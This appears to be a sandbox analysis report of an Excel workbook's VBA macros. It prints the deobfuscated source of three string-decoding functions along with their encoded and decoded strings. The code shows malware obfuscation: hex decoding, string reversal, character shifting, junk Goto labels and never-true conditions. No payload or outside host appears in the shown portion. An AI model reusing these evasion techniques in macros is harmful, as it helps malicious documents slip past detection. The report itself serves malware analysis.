Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
Part of subcall function vnf2pkQbq@ThisWorkbook: Len
Part of subcall function vnf2pkQbq@ThisWorkbook: Chr
Part of subcall function vnf2pkQbq@ThisWorkbook: Asc
Part of subcall function vnf2pkQbq@ThisWorkbook: Mid
StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Len
Part of subcall function QUj8uaqq5@ThisWorkbook: StrReverse
Part of subcall function QUj8uaqq5@ThisWorkbook: Mid
Part of subcall function QUj8uaqq5@ThisWorkbook: DoEvents
Part of subcall function GMpOmnDp4@ThisWorkbook: Len
Part of subcall function GMpOmnDp4@ThisWorkbook: Chr$
Part of subcall function GMpOmnDp4@ThisWorkbook: Val
Part of subcall function GMpOmnDp4@ThisWorkbook: Mid$
DoEvents

Strings	Decrypted Strings
"31"	"1"
"33"	"3"
"34"	"4"
"37"	"7"
"64594F744D6C5255"	"dYOtMlRU"
"6A6264674E4D567B"	"jbdgNMV{"
"7152555E747447"	"qRU^ttG"
"7749757B7B5667644E"	"wIu{{VgdN"
"795C75526A6C4E"	"y\uRjlN"
"QIMnNZS"
"SQZQqEx"
"vByenomrOU"
"wzOluE"
"ypDNwwjV"
"SQZQqEx"
"SQZQqEx"
"31"	"1"
"6A6264674E4D567B"	"jbdgNMV{"
"37"	"7"
"795C75526A6C4E"	"y\uRjlN"
"37"	"7"
"795C75526A6C4E"	"y\uRjlN"
"QIMnNZS"
"33"	"3"
"64594F744D6C5255"	"dYOtMlRU"
"31"	"1"
"6A6264674E4D567B"	"jbdgNMV{"
"wzOluE"
"QIMnNZS"
"vByenomrOU"
"34"	"4"
"7152555E747447"	"qRU^ttG"
"33"	"3"
"7749757B7B5667644E"	"wIu{{VgdN"
"wzOluE"
"33"	"3"
"64594F744D6C5255"	"dYOtMlRU"
"ypDNwwjV"
"ypDNwwjV"
"33"	"3"
"7749757B7B5667644E"	"wIu{{VgdN"
"vByenomrOU"
"34"	"4"
"7152555E747447"	"qRU^ttG"

Line	Instruction	Meta Information
371	Public Function SN2APmbS0(PdumDifjc as String) as String
372	Dim DIzYhzYcE as Variant	executed
373	For DIzYhzYcE = 1 To Len(PdumDifjc) Step 2	Len executed
374	If 403126443 = 403126443 + 1 Then
374	End
374	Endif
375	Dim HvkKlI4NE as Double
376	If 680816011 = 680816011 + 1 Then
376	End
376	Endif
377	Dim cBHDOSgCENXRuLdwRL as Boolean
378	Goto TvflFNChddchSYgvXW
378	TvflFNChddchSYgvXW:
380	Goto GTSjnphGVN
380	ENlgJLsyRaOuqqpu:
382	dsKfytiNQYVbLELqD = "SQZQqEx"
383	Goto mtJkjzpskIm
383	erSmRqHTHFzROlUgmitKvwFdKoDkqJ:
385	Goto TqCQyPBFfTQKd
386	Goto HnijhmQPQBcNehkcBeI
386	UeBjMcIOiqgLGGFKvov:
387	PLXnDKMVsnRTAGZhWC:
389	Goto AmCFIAZChQ
389	RQVGNUlLKbQTLkNsqYM:
391	dsKfytiNQYVbLELqD = "SQZQqEx"
392	Goto YOcmUUIIjsE
392	yzxCngnRfeuyA:
394	QsuDNIlBToHBrQggfkU = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6A6264674E4D567B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
395	Goto RhZJrtNqvIToBp
395	hisPwaqVdvDtZTUSYJ:
397	Goto nwwvAQelPdcsvyqOe
398	Goto JoOAPTQNnPvfbPka
398	wOyUEPVRduIQRczu:
400	MlCODAuMJhQbhdp = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("795C75526A6C4E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))	StrReverse executed
401	Goto ZFMfndIDECHszGQyxNDG
401	MqGZtMGwcllkoaSaEQQ:
402	nwwvAQelPdcsvyqOe:
404	Goto knfDSLvdgAd
404	RhZJrtNqvIToBp:
406	Goto HZnIwGeZCDkEJR
407	Goto CZYzhylpOp
407	uMJgCbSObrGcPZw:
409	SN2APmbS0 = SN2APmbS0 & StrReverse(Mid(PdumDifjc, DIzYhzYcE, 2))	StrReverse Mid
410	Goto UQDQdlaFOPNSq
410	odxofsDmlZKmIU:
412	MlCODAuMJhQbhdp = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("795C75526A6C4E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("37"))))))))))))))	StrReverse executed
413	Goto QiTYymkewtPl
413	EeeFNaCVBarRr:
414	GprLotGDmzZZAIVxRwUm:
416	Goto wOyUEPVRduIQRczu
416	UQDQdlaFOPNSq:
418	Goto tRvaYFuOEvJTCCp
419	Goto EivuKOQIixpaHJ
419	bAbmgyvSoMEBMesNBKje:
420	nysKtPzKQMYpELMQup:
422	Goto IpJOQMsBBAFcjqUih
422	nLeDepjBkHrBHDPgv:
424	PRmOThsMaNzbxwY = "QIMnNZS"
425	Goto ENlgJLsyRaOuqqpu
425	AmCFIAZChQ:
427	Goto NGqZbvYdqAVjQIk
428	Goto BVMDQbKJxjKhtHpGsw
428	knfDSLvdgAd:
430	RYrzoTPPOSExEjJv = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("64594F744D6C5255"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
431	Goto vFbobNpLJmTQbAbmgyvSoME
431	MesNBKjeGIpJOQM:
432	QZmNiMlCODAuM:
434	Goto BBAFcjqUihxAD
434	ZVPifBYwCyJN:
436	QsuDNIlBToHBrQggfkU = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("6A6264674E4D567B"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("31"))))))))))))))))))))))	StrReverse executed
437	Goto xzIRMqGZtM
437	ADvTjcLuwQtxLI:
439	Goto UAHbjYDzzxCouBStsIy
440	Goto EeeFNaCVBarRr
440	HnijhmQPQBcNehkcBeI:
441	hQbhdpFGcenKrUlRY:
443	Goto odxofsDmlZKmIU
443	BYwCyJNcxzI:
445	Goto xSrxtFIQsu
446	Goto MqGZtMGwcllkoaSaEQQ
446	EivuKOQIixpaHJ:
447	FhOgRVwVhbtqNjHA:
449	Goto HLaVESrsSco
449	PMYbqLMVgbETnGaUJ:
450	NGqZbvYdqAVjQIk:
452	Goto yzxCngnRfeuyA
452	QiTYymkewtPl:
454	Goto zoTPPOSExEjJvORJiLqaVKfULakSSF
455	Goto PMYbqLMVgbETnGaUJ
455	mtJkjzpskIm:
457	SgubtfjIxuoGDawUb = "wzOluE"
458	Goto OwlFwnAKtthhHQdFZEc
458	YOcmUUIIjsE:
460	PRmOThsMaNzbxwY = "QIMnNZS"
461	Goto AgDViVTNfdz
461	JoOAPTQNnPvfbPka:
462	TqCQyPBFfTQKd:
464	Goto fpYYKxYuHVDUGKkZVPi
464	CZYzhylpOp:
465	UAHbjYDzzxCouBStsIy:
467	Goto uMJgCbSObrGcPZw
467	TjcLuwQtxLIrEe:
469	Goto hQbhdpFGcenKrUlRY
470	Goto FNaCVBarRrwOyUEPVRduIQRczu
470	AgDViVTNfdz:
472	iEbzrnzPfAoxUPtv = "vByenomrOU"
473	Goto giCfkyudqPQrAMo
473	BBAFcjqUihxAD:
475	StsIyBtRvaYFuOEvJT = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7152555E747447"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse executed
476	Goto TjcLuwQtxLIrEe
476	vFbobNpLJmTQbAbmgyvSoME:
478	Goto GprLotGDmzZZAIVxRwUm
479	Goto MesNBKjeGIpJOQM
479	fpYYKxYuHVDUGKkZVPi:
481	fULakSSFsTqCQyPBFfT = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7749757B7B5667644E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
482	Goto BYwCyJNcxzI
482	HLaVESrsSco:
484	Goto kOnFfFQKdLjSdjfrHQe
484	ZFMfndIDECHszGQyxNDG:
486	Goto nysKtPzKQMYpELMQup
487	Goto QzecKyTJAOZHHuu
487	LvdgAdhvFbobNpLJmTl:
489	Goto QZmNiMlCODAuM
490	Goto bAbmgyvSoMEBMesNBKje
490	pMHlnTatBrQ:
492	SgubtfjIxuoGDawUb = "wzOluE"
493	Goto RQVGNUlLKbQTLkNsqYM
493	BVMDQbKJxjKhtHpGsw:
494	xSrxtFIQsu:
496	Goto ZVPifBYwCyJN
496	ZFMfndIDECHszGQyxNDGQzecKyTJAOZHHuu:
498	RYrzoTPPOSExEjJv = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("64594F744D6C5255"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
499	Goto erSmRqHTHFzROlUgmitKvwFdKoDkqJ
499	xzIRMqGZtM:
501	Goto FhOgRVwVhbtqNjHA
502	Goto wcllkoaSaEQQgknfD
502	kOnFfFQKdLjSdjfrHQe:
504	whbiLnYosvmLoTDzn = "ypDNwwjV"
505	Goto pMHlnTatBrQ
505	OwlFwnAKtthhHQdFZEc:
507	whbiLnYosvmLoTDzn = "ypDNwwjV"
508	Goto GurlDAYHRYTgwx
508	erSmRqHTHFzROlUgmitK:
510	fULakSSFsTqCQyPBFfT = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7749757B7B5667644E"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("33"))))))))))))))))))))))))))))))))))	StrReverse executed
511	Goto hisPwaqVdvDtZTUSYJ
511	GTSjnphGVN:
513	iEbzrnzPfAoxUPtv = "vByenomrOU"
514	Goto nLeDepjBkHrBHDPgv
514	FNaCVBarRrwOyUEPVRduIQRczu:
515	zoTPPOSExEjJvORJiLqaVKfULakSSF:
517	Goto ZFMfndIDECHszGQyxNDGQzecKyTJAOZHHuu
517	wcllkoaSaEQQgknfD:
518	tRvaYFuOEvJTCCp:
520	Goto LvdgAdhvFbobNpLJmTl
520	GurlDAYHRYTgwx:
522	Goto PLXnDKMVsnRTAGZhWC
523	Goto UeBjMcIOiqgLGGFKvov
523	IpJOQMsBBAFcjqUih:
525	StsIyBtRvaYFuOEvJT = vnf2pkQbq(StrReverse(QUj8uaqq5(GMpOmnDp4("7152555E747447"))), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(QUj8uaqq5(GMpOmnDp4("34"))))))))))))))))))))))))	StrReverse executed
526	Goto ADvTjcLuwQtxLI
526	QzecKyTJAOZHHuu:
527	HZnIwGeZCDkEJR:
529	Goto erSmRqHTHFzROlUgmitK
529	giCfkyudqPQrAMo:
531	DoEvents	DoEvents
532	Next DIzYhzYcE	Len executed
533	End Function

Function GMpOmnDp4, APIs: 4, Strings: 25, Number of lines: 104, Relevance: 52.604

APIs	Meta Information
Len	Len("3A33") -> 4 Len("33") -> 2 Len("46727B667B744B50514C766C") -> 24 Len("32") -> 2 Len("7A744E7C6A7C674C6B4D") -> 20 Len("34") -> 2 Len("4777727274517C6D7977") -> 20 Len("507A4A746D784C") -> 14 Len("35") -> 2 Len("456D5D556E4D74775970") -> 20 Len("2E50") -> 4 Len("38") -> 2 Len("54577D6D754A5E56825B76824A51") -> 28 Len("39") -> 2 Len("6E5F734F595681") -> 14 Len("6B6D527C4A59746C6E714B58") -> 24
Chr$
Val
Mid$

Strings	Decrypted Strings
"VnZdrpjByUr"
"hSjnphG"
"iEoEAMefA"
"okwcjluRMqs"
"xvdRmdThr"
"xvdRmdThr"
"okwcjluRMqs"
"okwcjluRMqs"
"VnZdrpjByUr"
"iEoEAMefA"
"hSjnphG"
"hSjnphG"
"xvdRmdThr"
"iEoEAMefA"
"VnZdrpjByUr"
"gdFGcd"
"uZQEtNEvI"
"PzJPLpDLMVtoRTA"
"gdFGcd"
"uZQEtNEvI"
"zUmitKZ"
"zUmitKZ"
"QBONehkcAIsbdxafsp"
"PzJPLpDLMVtoRTA"
"QBONehkcAIsbdxafsp"

Line	Instruction	Meta Information
1145	Public Function GMpOmnDp4(ByVal lqsTYOrK6 as String)
1146	Dim epFocqLY5 as Long, Y1y8e5Xg1 as String, XUS5NBx2n as String	executed
1147	On Local Error Resume Next
1148	For epFocqLY5 = 1 To Len(lqsTYOrK6) Step 2	Len("3A33") -> 4 executed
1149	If 511712427 = 511712427 + 1 Then
1149	End
1149	Endif
1150	Dim ogGVNwfhDfjwIcqdQq as Currency
1151	Goto LXRigDYvplvOclyTOr
1151	LXRigDYvplvOclyTOr:
1153	Goto URdgvQRblgJZsLfaOu
1153	afspYlKKmuHjCiG:
1155	fyGwcQQVbLSaqQQgVZQp = "xvdRmdThr"
1156	Goto yYkewfBlwCyJbqxyIgbE
1156	yYkewfBlwCyJbqxyIgbE:
1158	xYhtVpUsKkKVPiQoY = "okwcjluRMqs"
1159	Goto mtMTJpkljoagnEfe
1159	obbCKYzTyQoApgyvRBMSOarsN:
1161	xYhtVpUsKkKVPiQoY = "okwcjluRMqs"
1162	Goto ZwdGQDJdlaFBBAEqjq
1162	mtMTJpkljoagnEfe:
1164	Y1y8e5Xg1 = Y1y8e5Xg1 & Chr$(Val("&H" & Mid$(lqsTYOrK6, epFocqLY5, 2)))	Chr$ Val Mid$
1165	Goto kneDgLJrgAqhvF
1165	LjEdjfruIegpzuQnFa:
1167	NytiCtkxIrqePrNa = "VnZdrpjByUr"
1168	Goto ECHsltQkjzDFxQme
1168	vhwADvTxcLHwQGxLVEE:
1170	aNNoxJmFlIbnbZS = "iEoEAMefA"
1171	Goto eFcoCkBnrQFCw
1171	eFcoCkBnrQFCw:
1173	KjPtIpvOQMsnomrcUc = "hSjnphG"
1174	Goto LjEdjfruIegpzuQnFa
1174	wySvAOZtGuhHedEmDq:
1176	KjPtIpvOQMsnomrcUc = "hSjnphG"
1177	Goto TuFzROlHgYTgwLUeBwacIdiqfiihmIPQBONehkcAPIsbd
1177	ZwdGQDJdlaFBBAEqjq:
1179	fyGwcQQVbLSaqQQgVZQp = "xvdRmdThr"
1180	Goto vhwADvTxcLHwQGxLVEE
1180	TuFzROlHgYTgwLUeBwacIdiqfiihmIPQBONehkcAPIsbd:
1182	aNNoxJmFlIbnbZS = "iEoEAMefA"
1183	Goto afspYlKKmuHjCiG
1183	URdgvQRblgJZsLfaOu:
1185	NytiCtkxIrqePrNa = "VnZdrpjByUr"
1186	Goto wySvAOZtGuhHedEmDq
1186	kneDgLJrgAqhvF:
1188	Goto obbCKYzTyQoApgyvRBMSOarsN
1188	ECHsltQkjzDFxQme:
1190	Next epFocqLY5	Len("3A33") -> 4 executed
1191	If 156736 = 156736 + 1 Then
1191	End
1191	Endif
1192	Dim uQENkfJLrMRZPuDECH as Integer
1193	Goto sZtHvclmkpNTaFSRhk
1193	sZtHvclmkpNTaFSRhk:
1195	Goto KrUkQQqyoTOP
1195	UCTFJjJUOheAQvjvMbwktQLprY:
1197	GMpOmnDp4 = Y1y8e5Xg1
1198	Goto xFvbkkinKRZDP
1198	KrUkQQqyoTOP:
1200	CBppQZlNhMkCOCAuMJgP = "gdFGcd"
1201	Goto LakSRFrSpBPxOBFfSQKd
1201	mnlqbipFggwmoFiMKshBsjwH:
1203	aiYDyzxCnuBRssHxAs = "uZQEtNEvI"
1204	Goto pddEMZBUAZqCqiAxTDOUQctuPQ
1205	If 580083652 = 580083652 + 1 Then
1205	End
1205	Endif
1206	Dim HggHQcFYEbtTtFRBXH as Date
1207	Goto nfFTMvegBdiysboOOp
1207	nfFTMvegBdiysboOOp:
1208	xFvbkkinKRZDP:
1210	Goto fjmeCRKucfzcguqanM
1210	LdrzAJicFHouNVL:
1212	zZZzIUxQwTmLmxrJ = "PzJPLpDLMVtoRTA"
1213	Goto mnlqbipFggwmoFiMKshBsjwH
1213	pddEMZBUAZqCqiAxTDOUQctuPQ:
1215	If 125124413 = 125124413 + 1 Then
1215	End
1215	Endif
1216	Dim USXJPWnONdTWOmQusa as Currency
1217	Goto wLmHlKbCcnhAiFoAGC
1217	wLmHlKbCcnhAiFoAGC:
1219	CBppQZlNhMkCOCAuMJgP = "gdFGcd"
1220	Goto SDwDiJuKOQIiKpaUJe
1220	LakSRFrSpBPxOBFfSQKd:
1222	aiYDyzxCnuBRssHxAs = "uZQEtNEvI"
1223	Goto kGflhsvKghrAvZoHcu
1223	VMmBueLOjLPeoIQJwQt:
1225	cmHUHuVsqSARDHiHSMf = "zUmitKZ"
1226	Goto UCTFJjJUOheAQvjvMbwktQLprY
1226	fjmeCRKucfzcguqanM:
1228	cmHUHuVsqSARDHiHSMf = "zUmitKZ"
1229	Goto owIlEkHazalfxhDnyD
1229	owIlEkHazalfxhDnyD:
1231	isPKopVqvDtZiihmI = "QBONehkcAIsbdxafsp"
1232	Goto LdrzAJicFHouNVL
1232	kGflhsvKghrAvZoHcu:
1234	zZZzIUxQwTmLmxrJ = "PzJPLpDLMVtoRTA"
1235	Goto fKSTRQIBImzyO
1235	fKSTRQIBImzyO:
1237	isPKopVqvDtZiihmI = "QBONehkcAIsbdxafsp"
1238	Goto VMmBueLOjLPeoIQJwQt
1238	SDwDiJuKOQIiKpaUJe:
1240	End Function

Function vnf2pkQbq, APIs: 4, Strings: 25, Number of lines: 91, Relevance: 52.591

APIs	Meta Information
Len	Len(":3") -> 2 Len("vlQLKP{t{fFr") -> 12 Len("kMgLj\|N\|zt") -> 10 Len("yw\|mtQrrGw") -> 10 Len("LmxJtPz") -> 7 Len("YptwnM]UEm") -> 10 Len(".P") -> 2 Len("JQv\x201a\x201a[^VuJ}mTW") -> 14 Len("\xfffdYVsOn_") -> 7
Chr
Asc
Mid

Strings	Decrypted Strings
"CHEPh"
"QzDRcw"
"TuQsZ"
"UfojMcvPid"
"ufYg"
"CHEPh"
"ufYg"
"CHEPh"
"UfojMcvPid"
"TuQsZ"
"UfojMcvPid"
"TuQsZ"
"QzDRcw"
"QzDRcw"
"ufYg"
"GkOujDtkMQF"
"ESwegAdivs"
"GkOujDtkMQF"
"ylSNrtZ"
"iFpzFBetACLjeH"
"ESwegAdivs"
"iFpzFBetACLjeH"
"KYLx"
"KYLx"
"ylSNrtZ"

Line	Instruction	Meta Information
1011	Public Function vnf2pkQbq(ZSuDm6PNC as String, epFocqLY5 as Integer)
1012	Dim bEUHo15w2 as Integer	executed
1013	For bEUHo15w2 = 1 To Len(ZSuDm6PNC)	Len(":3") -> 2 executed
1014	If 280353888 = 280353888 + 1 Then
1014	End
1014	Endif
1015	Dim WPWBbNcgjbAcIrncvm as Integer
1016	Goto UuUgarpMhGutLZuirQ
1016	UuUgarpMhGutLZuirQ:
1018	Goto xkKhgIpHtxQxICURo
1018	bmrozQfnoxVPt:
1020	hPPCCenzbvayQcQNHaQu = "CHEPh"
1021	Goto qwPYMsoonrdjrHihx
1021	wZsYvNnNZSlU:
1023	DENmSwLsyRaPvqr = "ufYg"
1024	Goto bmrozQfnoxVPt
1024	qwPYMsoonrdjrHihx:
1026	Mid (ZSuDm6PNC, bEUHo15w2, 1) = Chr(Asc(Mid(ZSuDm6PNC, bEUHo15w2, 1)) - epFocqLY5)	Chr Asc Mid
1027	Goto qiGkOMujDtky
1027	rrefFObCQBasDspjB:
1029	hPPCCenzbvayQcQNHaQu = "CHEPh"
1030	Goto VFPVReuvQSczhJa
1030	OYYVbyFMrDD:
1032	dhGusmEBYuSZUgjy = "UfojMcvPid"
1033	Goto QaRqFyiPSnPTieNbAAc
1033	MgodIEEDItmtYykA:
1035	lVmqskJmQBxlFwnBLuu = "TuQsZ"
1036	Goto GyQAfOKzTKBOZHHv
1036	GyQAfOKzTKBOZHHv:
1038	dhGusmEBYuSZUgjy = "UfojMcvPid"
1039	Goto IfrFnEquUIF
1039	QaRqFyiPSnPTieNbAAc:
1041	lVmqskJmQBxlFwnBLuu = "TuQsZ"
1042	Goto wZsYvNnNZSlU
1042	IfrFnEquUIF:
1044	yGHFKvpwanmCGJAapiRz = "QzDRcw"
1045	Goto jbQjAOkYhEzdfLglt
1045	xkKhgIpHtxQxICURo:
1047	yGHFKvpwanmCGJAapiRz = "QzDRcw"
1048	Goto OYYVbyFMrDD
1048	qiGkOMujDtky:
1050	Goto rrefFObCQBasDspjB
1050	VFPVReuvQSczhJa:
1052	DENmSwLsyRaPvqr = "ufYg"
1053	Goto MgodIEEDItmtYykA
1053	jbQjAOkYhEzdfLglt:
1055	Next bEUHo15w2	Len(":3") -> 2 executed
1056	If 786462747 = 786462747 + 1 Then
1056	End
1056	Endif
1057	Dim GcXcZknDYZisnRgATm as Single
1058	Goto LnpWqyEtZiihmJQXCP
1058	LnpWqyEtZiihmJQXCP:
1060	Goto ssTcoQkPoFRFDxPM
1060	DLYATzQpOp:
1062	qwPYMsoonrdjrHihxnq = "GkOujDtkMQF"
1063	Goto SekgrIJfgqNu
1063	lNsdZMiYOdnVVIvVsF:
1065	zHwclmkpMSaERQhln = "ESwegAdivs"
1066	Goto ASEIiVTNgdzVuAwHKav
1066	ssTcoQkPoFRFDxPM:
1068	qwPYMsoonrdjrHihxnq = "GkOujDtkMQF"
1069	Goto nTbtBrQRSQVGAHlMxNRU
1069	ASEIiVTNgdzVuAwHKav:
1071	vuVDUGKlLQQjgCYxplwN = "ylSNrtZ"
1072	Goto GPKoEQrKEuaijh
1072	YQYCOOeilcBQ:
1074	vnf2pkQbq = ZSuDm6PNC
1075	Goto tbeybftDZmZLmIHkR
1075	nTbtBrQRSQVGAHlMxNRU:
1077	oNNpxKmGlJbBcnh = "iFpzFBetACLjeH"
1078	Goto lNsdZMiYOdnVVIvVsF
1078	zzyCahoSffuyB:
1080	zHwclmkpMSaERQhln = "ESwegAdivs"
1081	Goto RhaJruOrvJGpCc
1081	RhaJruOrvJGpCc:
1083	oNNpxKmGlJbBcnh = "iFpzFBetACLjeH"
1084	Goto DLYATzQpOp
1084	UZyZkewtPmK:
1086	JCJoBAQTQOnCvfNPkMRf = "KYLx"
1087	Goto yKcqLzIgbEGnHMUK
1087	tbeybftDZmZLmIHkR:
1089	Goto UZyZkewtPmK
1089	GPKoEQrKEuaijh:
1091	JCJoBAQTQOnCvfNPkMRf = "KYLx"
1092	Goto YQYCOOeilcBQ
1092	yKcqLzIgbEGnHMUK:
